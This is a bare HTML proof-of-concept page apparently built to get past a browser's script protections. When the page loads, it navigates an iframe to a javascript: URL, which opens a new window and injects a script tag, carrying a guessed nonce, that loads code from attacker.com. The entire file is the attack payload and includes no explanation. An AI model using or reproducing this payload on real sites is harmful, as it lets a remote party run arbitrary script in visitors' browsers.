<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGsxFeqGGGGG" src="about:blank"></iframe>
<script>
window.onload = function() {
    GGGGGsxFeqGGGGG.addEventListener("load",()=>{GGGGGsxFeqGGGGG.contentWindow.location.href="javascript:w=window.open('about:blank'); w.document.write('<script src=https://attacker.com/static/static.js nonce=123><\/script>');";},{once:true});
};
</script>
</body>
</html>